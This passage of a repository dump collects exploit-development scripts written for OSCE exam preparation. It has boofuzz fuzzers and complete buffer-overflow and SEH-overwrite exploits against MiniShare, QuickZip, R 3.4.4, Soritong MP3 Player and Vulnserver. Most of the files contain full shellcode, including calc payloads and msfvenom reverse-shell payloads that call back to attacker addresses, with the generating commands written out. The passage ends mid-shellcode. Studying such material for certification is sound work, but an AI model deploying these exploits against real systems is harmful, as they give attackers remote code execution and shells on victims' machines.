name="return-3", fuzzable = False) 30 | s_string("Cache-Control:", name="Cache-Control", fuzzable = False) 31 | s_delim(" ", name="space-5", fuzzable = False) 32 | s_string("max-age=0", name="Cache-Control-Value", fuzzable = False) 33 | s_delim("\r\n", name="return-4", fuzzable = False) 34 | s_string("Accept:", name="Accept", fuzzable = False) 35 | s_delim(" ", name="space-6", fuzzable = False) 36 | s_string("text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", name="Accept-Value", fuzzable = False) 37 | s_delim("\r\n", name="return-5", fuzzable = False) 38 | s_string("Upgrade-Insecure-Requests:", name="Upgrade-Insecure-Requests", fuzzable = False) 39 | s_delim(" ", name="space-7", fuzzable = False) 40 | s_string("1", name="Upgrade-Insecure-Requests-Value", fuzzable = False) 41 | 
s_delim("\r\n", name="return-6", fuzzable = False) 42 | s_string("User-Agent:", name="User-Agent", fuzzable = False) 43 | s_delim(" ", name="space-8", fuzzable = False) 44 | s_string("Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36", name="User-Agent-Value", fuzzable = False) 45 | s_delim("\r\n", name="return-7", fuzzable = False) 46 | s_string("Accept-Encoding:", name="Accept-Encoding", fuzzable = False) 47 | s_delim(" ", name="space-9", fuzzable = False) 48 | s_string("gzip, deflate, sdch", name="Accept-Encoding-Value", fuzzable = False) 49 | s_delim("\r\n", name="return-8", fuzzable = False) 50 | s_string("Accept-Language:", name="Accept-Language", fuzzable = False) 51 | s_delim(" ", name="space-10", fuzzable = False) 52 | s_string("tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4", name="Accept-Language-Value", fuzzable = False) 53 | s_delim("\r\n", name="return-9", fuzzable = False) 54 | s_string("Cookie:", name="Cookie", fuzzable = False) 55 | s_delim(" ", name="space-11", fuzzable = False) 56 | s_string("session_id=rG5JfL3QVJkEUhqKankXrO6cwwLok8", name="Cookie-Value", fuzzable = False) 57 | s_delim("\r\n", name="return-10", fuzzable = False) 58 | s_static("\r\n", name="Request-Line-CRLF") 59 | s_static("\r\n", "Request-CRLF") 60 | 61 | session.connect(s_get("Request")) 62 | 63 | session.fuzz() 64 | 65 | 66 | if __name__ == "__main__": 67 | main() 68 | -------------------------------------------------------------------------------- /Minishare/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os,sys,socket 4 | 5 | ip = "192.168.1.9" 6 | port = 80 7 | 8 | # bad \x0d 9 | 10 | offset = "A"*1787 11 | eip = "\x53\x93\x42\x7E" # user32.dll JMP ESP 7E429353 12 | nops = "\x90"*30 13 | shellcode = "" 14 | shellcode += "\xd9\xc8\xd9\x74\x24\xf4\x5a\x29\xc9\xb8\x45\x6b" 15 | shellcode += "\x73\x7f\xb1\x52\x83\xea\xfc\x31\x42\x13\x03\x07" 16 | 
shellcode += "\x78\x91\x8a\x7b\x96\xd7\x75\x83\x67\xb8\xfc\x66" 17 | shellcode += "\x56\xf8\x9b\xe3\xc9\xc8\xe8\xa1\xe5\xa3\xbd\x51" 18 | shellcode += "\x7d\xc1\x69\x56\x36\x6c\x4c\x59\xc7\xdd\xac\xf8" 19 | shellcode += "\x4b\x1c\xe1\xda\x72\xef\xf4\x1b\xb2\x12\xf4\x49" 20 | shellcode += "\x6b\x58\xab\x7d\x18\x14\x70\xf6\x52\xb8\xf0\xeb" 21 | shellcode += "\x23\xbb\xd1\xba\x38\xe2\xf1\x3d\xec\x9e\xbb\x25" 22 | shellcode += "\xf1\x9b\x72\xde\xc1\x50\x85\x36\x18\x98\x2a\x77" 23 | shellcode += "\x94\x6b\x32\xb0\x13\x94\x41\xc8\x67\x29\x52\x0f" 24 | shellcode += "\x15\xf5\xd7\x8b\xbd\x7e\x4f\x77\x3f\x52\x16\xfc" 25 | shellcode += "\x33\x1f\x5c\x5a\x50\x9e\xb1\xd1\x6c\x2b\x34\x35" 26 | shellcode += "\xe5\x6f\x13\x91\xad\x34\x3a\x80\x0b\x9a\x43\xd2" 27 | shellcode += "\xf3\x43\xe6\x99\x1e\x97\x9b\xc0\x76\x54\x96\xfa" 28 | shellcode += "\x86\xf2\xa1\x89\xb4\x5d\x1a\x05\xf5\x16\x84\xd2" 29 | shellcode += "\xfa\x0c\x70\x4c\x05\xaf\x81\x45\xc2\xfb\xd1\xfd" 30 | shellcode += "\xe3\x83\xb9\xfd\x0c\x56\x6d\xad\xa2\x09\xce\x1d" 31 | shellcode += "\x03\xfa\xa6\x77\x8c\x25\xd6\x78\x46\x4e\x7d\x83" 32 | shellcode += "\x01\xb1\x2a\x8a\xd9\x59\x29\x8c\xfb\xca\xa4\x6a" 33 | shellcode += "\x91\xfc\xe0\x25\x0e\x64\xa9\xbd\xaf\x69\x67\xb8" 34 | shellcode += "\xf0\xe2\x84\x3d\xbe\x02\xe0\x2d\x57\xe3\xbf\x0f" 35 | shellcode += "\xfe\xfc\x15\x27\x9c\x6f\xf2\xb7\xeb\x93\xad\xe0" 36 | shellcode += "\xbc\x62\xa4\x64\x51\xdc\x1e\x9a\xa8\xb8\x59\x1e" 37 | shellcode += "\x77\x79\x67\x9f\xfa\xc5\x43\x8f\xc2\xc6\xcf\xfb" 38 | shellcode += "\x9a\x90\x99\x55\x5d\x4b\x68\x0f\x37\x20\x22\xc7" 39 | shellcode += "\xce\x0a\xf5\x91\xce\x46\x83\x7d\x7e\x3f\xd2\x82" 40 | shellcode += "\x4f\xd7\xd2\xfb\xad\x47\x1c\xd6\x75\x77\x57\x7a" 41 | shellcode += "\xdf\x10\x3e\xef\x5d\x7d\xc1\xda\xa2\x78\x42\xee" 42 | shellcode += "\x5a\x7f\x5a\x9b\x5f\x3b\xdc\x70\x12\x54\x89\x76" 43 | shellcode += "\x81\x55\x98" 44 | 45 | 46 | buffer = offset + eip + nops + shellcode 47 | 48 | request = "GET " + buffer + " 
HTTP/1.1\r\n\r\n" 49 | 50 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 51 | s.connect((ip,port)) 52 | s.send(request) 53 | s.close() 54 | -------------------------------------------------------------------------------- /Minishare/fuzz: -------------------------------------------------------------------------------- 1 | GET / HTTP/1.1 2 | Host: 127.0.0.1 3 | Connection: keep-alive 4 | Pragma: no-cache 5 | Cache-Control: no-cache 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 9 | Accept-Encoding: gzip, deflate, sdch 10 | Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 11 | 12 | python boo-gen.py get.txt --get 13 | Start by testing / after GET and before HTTP/1.1 14 | 15 | -------------------------------------------------------------------------------- /ProSysInfo TFTP Server TFTPDWIN 0.4.2/fuzz.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | import time 4 | 5 | host = '' 6 | port = 69 7 | 8 | buffer=["A"] 9 | counter=25 10 | while len(buffer) <=400: 11 | buffer.append("A"*counter) 12 | counter=counter+25 13 | 14 | for string in buffer: 15 | try: 16 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 17 | except: 18 | print "Socket() failed" 19 | sys.exit(1) 20 | filename = string 21 | mode = "netascii" 22 | payload = "\x00\x02" + filename + "\0" + mode+ "\0" 23 | s.sendto(payload, (host, port)) 24 | time.sleep(1) 25 | -------------------------------------------------------------------------------- /QuickZip 4.60/explanation: -------------------------------------------------------------------------------- 1 | | Encoded shellcode | 0012FAF0 2 | | | 3 | | | 4 | | | 5 | | A buffer start | 0012FB63 6 | | | 7 | | | 8 | | jmp here (seh) | 0012FB81 9 | | | 10 | | shellcode_to_edx | 0012FB85 
(edx=12faf0 holds shellcode) 11 | | | 12 | | stack align | 0012FBA0 (esp = 12FBF8) 13 | | | 14 | | jmp_edx | 0012FBB3 (esp = 12FBF4) 15 | | | 16 | | | 17 | | B buffer start | 0012FBCD 18 | | | 19 | | | 20 | | | 21 | | | 22 | | | 23 | | JMP EDX | 0012FBF6 (jump to 0012FAF0) 24 | | | 25 | | | 26 | | A buffer ends | 0012FBFB 27 | | JMP back (nseh) | 0012FBFC 28 | -------------------------------------------------------------------------------- /QuickZip 4.60/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 4 | "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00") 5 | 6 | header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 7 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00" 8 | "\x24\x00\x00\x00\x00\x00\x00\x00") 9 | 10 | header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" 11 | "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00") 12 | 13 | # 710 bytes 14 | shellcode = "w00tw00t" 15 | shellcode += "\x89\xe1\xdb\xda\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" 16 | shellcode += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" 17 | shellcode += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" 18 | shellcode += "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" 19 | shellcode += "\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x4f\x72\x57\x70\x35\x50" 20 | shellcode += "\x77\x70\x65\x30\x4f\x79\x69\x75\x64\x71\x6b\x70\x50\x64" 21 | shellcode += "\x4e\x6b\x36\x30\x30\x30\x4e\x6b\x70\x52\x34\x4c\x6c\x4b" 22 | shellcode += "\x72\x72\x76\x74\x6e\x6b\x62\x52\x37\x58\x44\x4f\x6d\x67" 23 | shellcode += "\x50\x4a\x66\x46\x75\x61\x4b\x4f\x6c\x6c\x77\x4c\x71\x71" 24 | shellcode += "\x31\x6c\x77\x72\x44\x6c\x57\x50\x6b\x71\x7a\x6f\x64\x4d" 25 | shellcode += "\x57\x71\x48\x47\x7a\x42\x4c\x32\x52\x72\x46\x37\x6e\x6b" 26 | shellcode += 
"\x43\x62\x34\x50\x4e\x6b\x32\x6a\x77\x4c\x4e\x6b\x32\x6c" 27 | shellcode += "\x67\x61\x31\x68\x48\x63\x53\x78\x37\x71\x6e\x31\x43\x61" 28 | shellcode += "\x6c\x4b\x53\x69\x35\x70\x66\x61\x4a\x73\x4e\x6b\x50\x49" 29 | shellcode += "\x37\x68\x7a\x43\x35\x6a\x47\x39\x4e\x6b\x46\x54\x6c\x4b" 30 | shellcode += "\x56\x61\x48\x56\x30\x31\x79\x6f\x6c\x6c\x79\x51\x38\x4f" 31 | shellcode += "\x74\x4d\x53\x31\x5a\x67\x70\x38\x79\x70\x71\x65\x39\x66" 32 | shellcode += "\x34\x43\x51\x6d\x4b\x48\x77\x4b\x51\x6d\x45\x74\x64\x35" 33 | shellcode += "\x59\x74\x70\x58\x4e\x6b\x53\x68\x75\x74\x36\x61\x68\x53" 34 | shellcode += "\x33\x56\x6e\x6b\x74\x4c\x30\x4b\x6e\x6b\x63\x68\x67\x6c" 35 | shellcode += "\x57\x71\x5a\x73\x4c\x4b\x34\x44\x6c\x4b\x53\x31\x58\x50" 36 | shellcode += "\x6e\x69\x63\x74\x66\x44\x44\x64\x63\x6b\x31\x4b\x61\x71" 37 | shellcode += "\x70\x59\x51\x4a\x56\x31\x39\x6f\x6d\x30\x51\x4f\x31\x4f" 38 | shellcode += "\x51\x4a\x6c\x4b\x32\x32\x7a\x4b\x6e\x6d\x73\x6d\x42\x48" 39 | shellcode += "\x30\x33\x67\x42\x53\x30\x75\x50\x55\x38\x31\x67\x32\x53" 40 | shellcode += "\x76\x52\x51\x4f\x73\x64\x73\x58\x52\x6c\x50\x77\x47\x56" 41 | shellcode += "\x53\x37\x4b\x4f\x4b\x65\x68\x38\x6e\x70\x36\x61\x73\x30" 42 | shellcode += "\x77\x70\x31\x39\x6a\x64\x43\x64\x50\x50\x33\x58\x76\x49" 43 | shellcode += "\x4b\x30\x72\x4b\x55\x50\x59\x6f\x48\x55\x76\x30\x36\x30" 44 | shellcode += "\x52\x70\x32\x70\x73\x70\x52\x70\x37\x30\x62\x70\x72\x48" 45 | shellcode += "\x78\x6a\x54\x4f\x59\x4f\x4b\x50\x4b\x4f\x69\x45\x4c\x57" 46 | shellcode += "\x31\x7a\x44\x45\x50\x68\x79\x50\x4d\x78\x67\x71\x32\x31" 47 | shellcode += "\x55\x38\x67\x72\x47\x70\x64\x51\x61\x4c\x6c\x49\x68\x66" 48 | shellcode += "\x30\x6a\x36\x70\x42\x76\x73\x67\x55\x38\x4c\x59\x6c\x65" 49 | shellcode += "\x51\x64\x53\x51\x79\x6f\x6b\x65\x4f\x75\x6b\x70\x50\x74" 50 | shellcode += "\x74\x4c\x69\x6f\x70\x4e\x56\x68\x74\x35\x68\x6c\x73\x58" 51 | shellcode += "\x38\x70\x78\x35\x59\x32\x30\x56\x6b\x4f\x4e\x35\x31\x78" 52 | shellcode 
+= "\x63\x53\x50\x6d\x70\x64\x35\x50\x4f\x79\x7a\x43\x72\x77" 53 | shellcode += "\x71\x47\x42\x77\x70\x31\x78\x76\x33\x5a\x77\x62\x52\x79" 54 | shellcode += "\x31\x46\x49\x72\x39\x6d\x63\x56\x6f\x37\x47\x34\x37\x54" 55 | shellcode += "\x57\x4c\x57\x71\x45\x51\x6c\x4d\x31\x54\x46\x44\x64\x50" 56 | shellcode += "\x7a\x66\x73\x30\x33\x74\x66\x34\x32\x70\x62\x76\x66\x36" 57 | shellcode += "\x30\x56\x53\x76\x62\x76\x30\x4e\x42\x76\x63\x66\x71\x43" 58 | shellcode += "\x53\x66\x55\x38\x70\x79\x5a\x6c\x67\x4f\x6b\x36\x59\x6f" 59 | shellcode += "\x78\x55\x6b\x39\x39\x70\x30\x4e\x61\x46\x52\x66\x39\x6f" 60 | shellcode += "\x70\x30\x32\x48\x74\x48\x6d\x57\x65\x4d\x53\x50\x69\x6f" 61 | shellcode += "\x4b\x65\x4d\x6b\x4c\x30\x78\x35\x39\x32\x52\x76\x63\x58" 62 | shellcode += "\x4e\x46\x4f\x65\x6d\x6d\x6d\x4d\x6b\x4f\x38\x55\x45\x6c" 63 | shellcode += "\x57\x76\x53\x4c\x77\x7a\x6b\x30\x4b\x4b\x79\x70\x54\x35" 64 | shellcode += "\x67\x75\x4f\x4b\x50\x47\x74\x53\x30\x72\x62\x4f\x50\x6a" 65 | shellcode += "\x67\x70\x72\x73\x6b\x4f\x59\x45\x41\x41" 66 | 67 | # 117 bytes 68 | #egghunter = ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FMQyZYovoBbqBcZwrpXZm4nwLveCjd48omh3GP0VPCDlKijNO0uYznOt5HgkO8gAA") 69 | 70 | egghunter = ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI2FmQIZYoFoPB0Rpj321HhMfNUl4ERzbTzOOHPwp0FPCDLK8zlo3ExjloBUIwYom7AA") 71 | 72 | # 27 bytes 73 | shellcode_to_edx = ("\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5a\x56\x4e\x55\x2d\x5a\x56\x4e\x55\x2d\x5c\x58\x50\x55\x50\x5A") 74 | 75 | # 19 bytes 76 | decode_stack_alignment = ("\x54\x58\x2d\x42\x53\x55\x55\x2d\x42\x53\x55\x55\x2d\x44\x53\x55\x55\x50\x5c") 77 | 78 | # 26 bytes 79 | encoded_jmp_edx = ("\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x25\x55\x5e\x2d\x25\x25\x55\x5e\x2d\x26\x25\x56\x60\x50") 80 | 81 | # 171 - 117 = 54/2 = 27 82 | offset = "A"*26 + egghunter + "A"*28 83 | offset += "B" * 4 + shellcode_to_edx + decode_stack_alignment + encoded_jmp_edx 84 | offset += 
"C"*(123-4-len(shellcode_to_edx)-len(decode_stack_alignment)-len(encoded_jmp_edx)) 85 | nseh = "\x71\x9f\x70\x9f" 86 | seh = "\x33\x28\x42\x00" #00422833 87 | 88 | junk = "D"* 4 + shellcode+ "D"* (4064-294-4-4-4-len(shellcode)) 89 | payload = offset + nseh + seh + junk 90 | payload += ".txt" 91 | 92 | exploit = header_1 + payload + header_2 + payload + header_3 93 | 94 | myfile = open('try.zip','w'); 95 | myfile.write(exploit); 96 | myfile.close() 97 | -------------------------------------------------------------------------------- /R v3.4.4/exploit.py: -------------------------------------------------------------------------------- 1 | filename = "r.txt" 2 | 3 | offset = "A"*900 4 | nseh = "\xeb\x0b\x90\x90" 5 | seh = "\x1C\x08\xC0\x6C" # pop-pop-ret from R.dll 6 | nops = "\x90" *24 7 | 8 | # \x00\x0d 9 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 10 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 11 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 12 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 13 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 14 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 15 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 16 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 17 | "\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 18 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 19 | "\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 20 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 21 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 22 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 23 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 24 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 25 | "\x63\x03\x6b") 26 | 27 | 28 | buffer = offset + nseh + seh + nops + calc 29 | 30 | f = open(filename,'w') 31 | 
f.write(buffer) 32 | f.close() 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCE-Exploit-Development 2 | 3 | Hi guys, 4 | 5 | These are some exploits I wrote during my OSCE preparation. I hope they will be helpful to people preparing for the OSCE exam and to people new to exploit development. 6 | 7 | As always: 8 | 9 | May the Force be with you! 10 | -------------------------------------------------------------------------------- /Ricoh DC Software DL-10 FTP Server/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # boofuzz template for Solar FTP 2.1.1 PASV command 3 | 4 | from boofuzz import * 5 | 6 | host = "192.168.1.10" 7 | port = 21 8 | 9 | def main(): 10 | session = Session(target=Target(connection=SocketConnection(host, port, proto='tcp'))) 11 | 12 | s_initialize("user") 13 | s_static("USER") 14 | s_delim(" ") 15 | s_string("anonymous") 16 | s_static("\r\n") 17 | 18 | s_initialize("pass") 19 | s_static("PASS") 20 | s_delim(" ") 21 | s_static("test") 22 | s_static("\r\n") 23 | 24 | session.connect(s_get("user")) 25 | session.connect(s_get("user"), s_get("pass")) 26 | 27 | session.fuzz() 28 | if __name__ == "__main__": 29 | main() 30 | -------------------------------------------------------------------------------- /SolarFTP/fuzz.py: -------------------------------------------------------------------------------- 1 | from boofuzz import * 2 | host = "192.168.1.6" 3 | port = 21 4 | start_cmd = "net start \"Solar FTP Server\"" 5 | stop_cmd = "net stop \"Solar FTP Server\"" 6 | proc_name = "sfsservice.exe" 7 | def main(): 8 | session = Session( 9 | target=Target( 10 | connection=SocketConnection(host, port, proto='tcp'), 11 | procmon=pedrpc.Client(host, 26002), 12 | procmon_options={ 13 | "proc_name": proc_name, 14 | "stop_commands": [start_cmd], 15 | 
"start_commands": [start_cmd] 16 | } 17 | ), 18 | web_port =8080) 19 | 20 | s_initialize("user") 21 | s_static("USER") 22 | s_delim(" ") 23 | s_static("test") 24 | s_static("\r\n") 25 | 26 | s_initialize("pass") 27 | s_static("PASS") 28 | s_delim(" ") 29 | s_string("test") 30 | s_static("\r\n") 31 | 32 | s_initialize("pasv") 33 | s_static("PASV") 34 | s_delim(" ") 35 | s_string("Fuzz") 36 | s_static("\r\n") 37 | session.connect(s_get("user")) 38 | session.connect(s_get("user"), s_get("pass")) 39 | session.connect(s_get("pass"), s_get("pasv")) 40 | 41 | session.fuzz() 42 | if __name__ == "__main__": 43 | main() 44 | -------------------------------------------------------------------------------- /Soritong MP3 Player 1.0/exploit.py: -------------------------------------------------------------------------------- 1 | path = "UI.txt" 2 | 3 | buffer = "A" * 584 4 | 5 | buffer += "\xeb\x06\x90\x90" # next SEH overwrite - breakpoint 6 | buffer += "\x12\xE8\x01\x10" #pop pop ret from player.dll 7 | 8 | # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com 9 | buffer += 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46\x4e\x36\x43\x46\x42\x50\x5a"; 10 | 11 | buffer += "\x90" *1000 # nop sled 12 | 13 | file = open (path, "w") 14 | file.write(buffer) 15 | file.close() 16 | -------------------------------------------------------------------------------- /Soritong MP3 Player 1.0/payload.py: -------------------------------------------------------------------------------- 1 | path = "C:\Program Files\SoriTong\Skin\Default\UI.txt" 2 | buffer = "A" * 5000 3 | file = open (path, "w") 4 | file.write(buffer) 5 | file.close() 6 | -------------------------------------------------------------------------------- /Vulnserver/gmon.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | host = "192.168.1.4" 8 | port = 9999 9 | 10 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=6767 EXITFUNC=thread -b "\x00" -f c 11 | shellcode = "kalikali" 12 | shellcode += ("\xdd\xc0\xbb\x49\xc9\x16\x1b\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 13 | "\x52\x31\x5e\x17\x83\xee\xfc\x03\x17\xda\xf4\xee\x5b\x34\x7a" 14 | "\x10\xa3\xc5\x1b\x98\x46\xf4\x1b\xfe\x03\xa7\xab\x74\x41\x44" 15 | "\x47\xd8\x71\xdf\x25\xf5\x76\x68\x83\x23\xb9\x69\xb8\x10\xd8" 16 | "\xe9\xc3\x44\x3a\xd3\x0b\x99\x3b\x14\x71\x50\x69\xcd\xfd\xc7" 17 | "\x9d\x7a\x4b\xd4\x16\x30\x5d\x5c\xcb\x81\x5c\x4d\x5a\x99\x06" 18 | "\x4d\x5d\x4e\x33\xc4\x45\x93\x7e\x9e\xfe\x67\xf4\x21\xd6\xb9" 19 | "\xf5\x8e\x17\x76\x04\xce\x50\xb1\xf7\xa5\xa8\xc1\x8a\xbd\x6f" 20 | "\xbb\x50\x4b\x6b\x1b\x12\xeb\x57\x9d\xf7\x6a\x1c\x91\xbc\xf9" 21 | "\x7a\xb6\x43\x2d\xf1\xc2\xc8\xd0\xd5\x42\x8a\xf6\xf1\x0f\x48" 22 | "\x96\xa0\xf5\x3f\xa7\xb2\x55\x9f\x0d\xb9\x78\xf4\x3f\xe0\x14" 23 | "\x39\x72\x1a\xe5\x55\x05\x69\xd7\xfa\xbd\xe5\x5b\x72\x18\xf2" 24 | "\x9c\xa9\xdc\x6c\x63\x52\x1d\xa5\xa0\x06\x4d\xdd\x01\x27\x06" 25 | "\x1d\xad\xf2\x89\x4d\x01\xad\x69\x3d\xe1\x1d\x02\x57\xee\x42" 26 | "\x32\x58\x24\xeb\xd9\xa3\xaf\xd4\xb6\xaa\x25\xbd\xc4\xac\x23" 27 | "\x52\x40\x4a\x39\xbc\x04\xc5\xd6\x25\x0d\x9d\x47\xa9\x9b\xd8" 28 | "\x48\x21\x28\x1d\x06\xc2\x45\x0d\xff\x22\x10\x6f\x56\x3c\x8e" 29 | "\x07\x34\xaf\x55\xd7\x33\xcc\xc1\x80\x14\x22\x18\x44\x89\x1d" 30 | "\xb2\x7a\x50\xfb\xfd\x3e\x8f\x38\x03\xbf\x42\x04\x27\xaf\x9a" 31 | "\x85\x63\x9b\x72\xd0\x3d\x75\x35\x8a\x8f\x2f\xef\x61\x46\xa7" 32 | "\x76\x4a\x59\xb1\x76\x87\x2f\x5d\xc6\x7e\x76\x62\xe7\x16\x7e" 33 | "\x1b\x15\x87\x81\xf6\x9d\xa7\x63\xd2\xeb\x4f\x3a\xb7\x51\x12" 34 | "\xbd\x62\x95\x2b\x3e\x86\x66\xc8\x5e\xe3\x63\x94\xd8\x18\x1e" 35 | "\x85\x8c\x1e\x8d\xa6\x84") 36 | 37 | 38 | # 32 bytes egg=kali 39 | egghunter = 
("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 40 | "\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 41 | 42 | offset = shellcode + "A"*(3494-32-16-len(shellcode)) 43 | offset += egghunter # 32 bytes 44 | offset += "A"*(16) # 16 bytes 45 | nseh = "\xeb\xce\x90\x90" #jmp back -48=\xce 46 | seh = "\x2B\x17\x50\x62" #6250172B 47 | #jmp_back = "\x54\x58\x66\x05\xE6\x03\xFF\xE0" 48 | 49 | buffer = offset + nseh + seh + "C"*(5012-len(offset)-8) 50 | 51 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 52 | s.connect((host,port)) 53 | print s.recv(1024) 54 | s.send("GMON /.../" + buffer) 55 | print s.recv(1024) 56 | s.close() 57 | -------------------------------------------------------------------------------- /Vulnserver/others: -------------------------------------------------------------------------------- 1 | Lter and KSTET are explained in my blog: 2 | https://areyou1or0.blogspot.com 3 | -------------------------------------------------------------------------------- /Vulnserver/trun-exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | host="192.168.1.104" 8 | port=9999 9 | 10 | # bad: \x00 11 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.106 LPORT=6767 --platform windows -a x86 -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode 12 | 13 | shellcode = "" 14 | shellcode += "\xdb\xd5\xd9\x74\x24\xf4\xb8\x19\xf2\x1e\x37\x5e" 15 | shellcode += "\x2b\xc9\xb1\x52\x31\x46\x17\x03\x46\x17\x83\xdf" 16 | shellcode += "\xf6\xfc\xc2\x23\x1e\x82\x2d\xdb\xdf\xe3\xa4\x3e" 17 | shellcode += 